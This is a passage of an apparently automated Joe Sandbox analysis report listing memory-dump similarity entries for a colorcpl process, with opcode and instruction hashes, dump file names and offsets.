                                                                                                                                          • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                          • Instruction Fuzzy Hash: 6401D83220CB059FD7118A59D954F57B7E6FBC5314F044429F7528B750DA70F840D794
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e937e0f48e80cababf977fea91677de59f33ede2b9c68ac73ae5f4128b095129
                                                                                                                                          • Instruction ID: f18b778e0453a862666e0f913f5bbafccf2ba378e673a2910fbb41809a320caf
                                                                                                                                          • Opcode Fuzzy Hash: e937e0f48e80cababf977fea91677de59f33ede2b9c68ac73ae5f4128b095129
                                                                                                                                          • Instruction Fuzzy Hash: D71139B16193089FC700DF69D445A5BBBE4EF99710F004A1EB998D7391E634E900CBA2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8f0e0afd8760c8aff354b6fe29b8bee0465cc3d6f257ec0e19b7e8a17fab8887
                                                                                                                                          • Instruction ID: 933fce632d428921207a543b1a57b61be6acc8cf8c23925fc99fe9b5e152cc6e
                                                                                                                                          • Opcode Fuzzy Hash: 8f0e0afd8760c8aff354b6fe29b8bee0465cc3d6f257ec0e19b7e8a17fab8887
                                                                                                                                          • Instruction Fuzzy Hash: 0101F731708704DBEB0ACF69DD549AF77F9AF84724B850129A901EB694DE30DD01C290
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                          • Instruction ID: 67853917e891bc2315cdcc127f96376ccc66c5eff7ccb0ce836d24c7871f25cc
                                                                                                                                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                          • Instruction Fuzzy Hash: 89018B32209784DFD3238719CB48F267BE8EF89794F1904A1F904CB6A2D639DD40CA61
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 34ac43544915eec42608dfbffeaec85dbc0fe431fae527b1824bf275e65f9546
                                                                                                                                          • Instruction ID: a01a5c153c6c9eb42183cba7c7c6ad70cdcd63b3462fdbbe76abb93c90ce835d
                                                                                                                                          • Opcode Fuzzy Hash: 34ac43544915eec42608dfbffeaec85dbc0fe431fae527b1824bf275e65f9546
                                                                                                                                          • Instruction Fuzzy Hash: 9F01A271288700AFD3234F26C940F12BBE8DF65B64F15082AB6069F3D0D6F1E840CB54
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e27e52f4393af687b18e09b2a7f56a66b6188a4f63950db1032c0c6c998280a3
                                                                                                                                          • Instruction ID: 9ce11976e82d9f963227e50ba43ff83b737217963a192ec7fa87f6406e16fe92
                                                                                                                                          • Opcode Fuzzy Hash: e27e52f4393af687b18e09b2a7f56a66b6188a4f63950db1032c0c6c998280a3
                                                                                                                                          • Instruction Fuzzy Hash: BCF0F433745B20B7C7328B578D54F077FADEB94B90F008168F6049B640CA70DD01CAA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d626618199ba3df53be6943fd051c04ba9aabec046ccb75882e644cd133185b6
                                                                                                                                          • Instruction ID: 4c0c40fb1c0140176be5dc054aa030b71713be7701c10da2d25e4374d331739b
                                                                                                                                          • Opcode Fuzzy Hash: d626618199ba3df53be6943fd051c04ba9aabec046ccb75882e644cd133185b6
                                                                                                                                          • Instruction Fuzzy Hash: A6017C71A14309ABCB04DFA9D455AAEB7F8EF58304F10402AF910EB391D674EA00CBA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0d49feef7532ee908058ddbeecf96904767785056b5c47f39a6b6b7843a782c4
                                                                                                                                          • Instruction ID: d1ad7f2e9192d18d7b47feb85e849d6f261dae1942ee65cdcf246d22f3f26f63
                                                                                                                                          • Opcode Fuzzy Hash: 0d49feef7532ee908058ddbeecf96904767785056b5c47f39a6b6b7843a782c4
                                                                                                                                          • Instruction Fuzzy Hash: 92017C71A04309ABCB00CFA9D445AAEB7F8EF58304F50402AF910EB390D6749A00CBA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f5f06a37ca11a47e81e7cec8cbacf32100a911509aa6e9204707d475269beedc
                                                                                                                                          • Instruction ID: 33935c339f65116b66b932b1f076b5a20b896bc0d3dc51e631886cb49b58bd2f
                                                                                                                                          • Opcode Fuzzy Hash: f5f06a37ca11a47e81e7cec8cbacf32100a911509aa6e9204707d475269beedc
                                                                                                                                          • Instruction Fuzzy Hash: E7012C75A14309ABCB05CFA9D555AAEB7F8EF58704F10406AF914EB390D674DA01CBA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                          • Instruction ID: 30439ec42afb7bf18a43bd07c904fb7bf5922974dd0474a74141d650c14367c4
                                                                                                                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                          • Instruction Fuzzy Hash: CBF0C23320DB229BD7230AD94844F1B6AA98FD5B64F160039E308AB640CA648C02B6D7
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
• Instruction ID: ed3631dd810ed38acbe64f01f907d39688647a399f647b44c9f5359f2cc81b7c
• Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
• Instruction Fuzzy Hash: 98F0C2B2A00711ABD329CF4DDD40E67B7FADBD4B80F048168A505CB220EA31ED04CB90
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
• Instruction ID: ec9502ac7c51cb575425694db662b88fe6475008a0efee047de7e1fdc740da67
• Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
• Instruction Fuzzy Hash: AE01F4322087849BD3238B19D909F49BFD8EF82754F4841A5FE04DF6A2D679C910C254
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
• Instruction ID: 09ab52269bc93120cd80328191df22a01f98e5a9c31916a5c04927ee8b5be006
• Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
• Instruction Fuzzy Hash: D0F01D7220421DBFEF029F94DD80DAF7B7DEB593A8B104225FA1196160D635DE21ABA0
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8a8442e51d16bbdeceabcc03e472521bcf666aafcfb9b16953ce8b25470d56ad
• Instruction ID: d2138ce20eb71c3fd67443566635d32df1f63a23bcccd9a17289e7398f09fa48
• Opcode Fuzzy Hash: 8a8442e51d16bbdeceabcc03e472521bcf666aafcfb9b16953ce8b25470d56ad
• Instruction Fuzzy Hash: 75018F71A043489BCB01CFA9D445AEEB7F8AF58314F14005AF900EB380D734EA01CBA4
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e850303809fa347ce25b6f8123586570fb5f3e9cef3bad4135bd2445be710ba
• Instruction ID: 639bc63ba37bda65bb98994967dc952b3ef7845a78539cda8ab56e29c80b85e0
• Opcode Fuzzy Hash: 5e850303809fa347ce25b6f8123586570fb5f3e9cef3bad4135bd2445be710ba
• Instruction Fuzzy Hash: 62019736104219ABCF128F84CD40ECE3FB6FB4C764F068201FE19A6260C23AD970EB81
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: db3a23a18be2168f01f66661a257c7fe1d572f2c3c37f77d740a085c8778036a
• Instruction ID: 910a77e67f6a3007b473f323d86dabfae7f4e89a560b1091d2b21f1d8d5b17e3
• Opcode Fuzzy Hash: db3a23a18be2168f01f66661a257c7fe1d572f2c3c37f77d740a085c8778036a
• Instruction Fuzzy Hash: F8F02BB228C3015BF70185558E41F5233A5EFE0751F65802DEB058F2C1EE70DC01E3A6
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 78cd1d5c65a33406fdb5efcbfbc487befaef11d84f8aa186e29e96e68f67417d
• Instruction ID: c12136281663e3f44271e15bd8f37ee91195b98e10a80d3b5c5666932d5bb891
• Opcode Fuzzy Hash: 78cd1d5c65a33406fdb5efcbfbc487befaef11d84f8aa186e29e96e68f67417d
• Instruction Fuzzy Hash: 0901A47028C7849BE3138B38DE68F1573E4AB40B44F9406A0FE01EB6D6D76CD511C210
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
• Instruction ID: c5c19c61eabc5fa7b8a2f027fe315c35ace8760df49ffb195b71c50e1aa9d6cf
• Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
• Instruction Fuzzy Hash: A3F0BE3234AB1247DB269E3AA934B2AA695AFE0B10F01073C9A01AB680DF20D800C790
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
• Instruction ID: aabd3332378c94c69397425b37ade14c43b6487baaf469631378b3a54d70917b
• Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
• Instruction Fuzzy Hash: EBF0E23370A7119BC3228A49CDA1F0673A8EFD5A70F560274A644AF260C360EC41CBD0
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 14574b4de7d79edc10b8ed12fd27207bfe134775c9b236117870c5004a75055f
• Instruction ID: 36cdaa260b6722ef405da026fef7917b10761e8d756fb95e84c09c919e6a5555
• Opcode Fuzzy Hash: 14574b4de7d79edc10b8ed12fd27207bfe134775c9b236117870c5004a75055f
• Instruction Fuzzy Hash: D3F0AF706193049FC310EF28C556E2AB7E4FF98714F40465EBC98DB394E638E900C796
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
• Instruction ID: f7eb007f32d8c037cee79bd34eb504429ed126b362568155c16bcfea30c53812
• Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
• Instruction Fuzzy Hash: 1EF0B472614304AFE715CB25CD06F46B7E9EF9C354F1480789944D7160FAB4ED21D654
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 15cb060d4e9bacead743f29c5b8554d44f4b5bbb8d6d3a8aba3281ad8cc9f144
• Instruction ID: 77cb90cfc9b0f9335c82b39e6dc44c49cad3e0b023250f397b487444bb2ed343
• Opcode Fuzzy Hash: 15cb060d4e9bacead743f29c5b8554d44f4b5bbb8d6d3a8aba3281ad8cc9f144
• Instruction Fuzzy Hash: A6F04F70A0534DAFCB05DF69C525EAEB7B4EF58304F008169B955EB385DA38EA05CB90
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d55db16a3a19451d527beffefd5453f97dc77197dbe53b78efc652780fff4196
• Instruction ID: 4bd6ed13660091d9357a0b9e08fca484d1b60ec8689706297e8da01835a207f5
• Opcode Fuzzy Hash: d55db16a3a19451d527beffefd5453f97dc77197dbe53b78efc652780fff4196
• Instruction Fuzzy Hash: 7EF0BE3293EFE09FD312CB68C275F427BD49B00764F058BBAD98987512C734D980C651
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ba9ac0c1101adcbc7ea54e0b7073a21d3745a91e9fb0bf85a817a5b3d9022c16
• Instruction ID: 122c3cb93d7e9b20d18098772b5966beefc41eee01874ee4c3db06c4a710b824
• Opcode Fuzzy Hash: ba9ac0c1101adcbc7ea54e0b7073a21d3745a91e9fb0bf85a817a5b3d9022c16
• Instruction Fuzzy Hash: A8F05CAB41E7D047CB124B3476983C93B649743210F0A1849DCEB7F28AC678C983C230
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
• Instruction ID: 7eb62f96eb53cae65023e96301210f4957ca08c1d5f07f8ac332b50b354a09d3
• Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
• Instruction Fuzzy Hash: F1E0D8323447006BD7138E598CC4F6777AEDFE6B10F000079B9046F252C9E2DC0983A4
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eb9e2431d708edc02523fc6dd32bf81de82251f19e4625b7b085e1fe3a7d49aa
• Instruction ID: 5bc972928e7c7fdfc2f0049d73a9c3e7abe67e6b14e9499b6b338e8f3c4f01c0
• Opcode Fuzzy Hash: eb9e2431d708edc02523fc6dd32bf81de82251f19e4625b7b085e1fe3a7d49aa
• Instruction Fuzzy Hash: 51F0277551E7549FC312CB14C344F41F3D4EB00BA4F05956DDD05C7513C360CAA0CA91
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                          • Instruction ID: 384e08580e08e765b762b1992fcbafcab3776c5ddbd67c331409e213064f84ec
                                                                                                                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                          • Instruction Fuzzy Hash: BEF030721483049FE3118F06D984F52B7E8EB05364F41C025E7089B561D379EC40CBA4
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                          • Instruction ID: 60fcc3889a32bb0a1de20765740e3acc0b0502d107e6e208ac75119d7fefabea
                                                                                                                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                          • Instruction Fuzzy Hash: 01F0E53A20CB459BDB06CF16D040E857BE4EB51350F000194F8418F312D735E981CF90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                          • Instruction ID: 02b09e90d7acde4877f595da3ee896e92be0b33aecafe83cc54562969c4bed45
                                                                                                                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                          • Instruction Fuzzy Hash: 13E0923224C344ABD3625F658818F56B7A5ABD47A0F510439FA08AB150DB70DC50E79C
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1134af1017838bc7dcd79fc992dfca41226c3eadeb75b54ae722daccbff2799b
                                                                                                                                          • Instruction ID: 32808e40eef00aa56580f904f8d9ef930976378f46a70d3f5278f70b1f9c9acd
                                                                                                                                          • Opcode Fuzzy Hash: 1134af1017838bc7dcd79fc992dfca41226c3eadeb75b54ae722daccbff2799b
                                                                                                                                          • Instruction Fuzzy Hash: 93F0923292EB918FE362C728EBA4F4673E5BF10734F160AB4D50597B22D724ED80C650
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                          • Instruction ID: 833665c84b11364390b37d83e0badf7b3bc68acc00679fc1205c6ad1c580997c
                                                                                                                                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                          • Instruction Fuzzy Hash: 1CE0DF32A40310BBDB228BA98E45F9ABAACDF94FA4F010064BB00EB090D530DE10D690
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                          • Instruction ID: 88c6ec9eb971a4fd64ac0bc5386685ef6bc08147b1bfa2168e5617fc93fc9084
                                                                                                                                          • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                          • Instruction Fuzzy Hash: 74E0923264C3908FC7148A1AC242B93B7ECEFB5766F2580AAD92847716C231F842D6D0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                          • Instruction ID: 35067755fb5608a36b3cb4f3418e53d738048528a22b0b0fc2d82c8f0dc8f7fa
                                                                                                                                          • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                          • Instruction Fuzzy Hash: F9E09232018710DFD7335F25C908B62B7E0FF50755F148C2DA49A124B0CBB8A8C0CA80
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 40fae56c2f7ef63ac8bc54731b57bc3f5109b83a815f6e7d4d4e40520767abe4
                                                                                                                                          • Instruction ID: d438607150ec638b2b04caaf9e98282f198c12365854877953141329e188be04
                                                                                                                                          • Opcode Fuzzy Hash: 40fae56c2f7ef63ac8bc54731b57bc3f5109b83a815f6e7d4d4e40520767abe4
                                                                                                                                          • Instruction Fuzzy Hash: A3E09232104B549BC323AB29CD05F9A779AEFB0360F014625F156571D1CB74AC50C7C8
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                          • Instruction ID: 8aded25efe4a19dff4ebe7d7524a411928ff1ac9e8d4118966461e488e641854
                                                                                                                                          • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                          • Instruction Fuzzy Hash: ABE0AE343043058BD705CF19C161B6277B6BFD5A24F24C1B8A9488F205EB33A8429A40
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
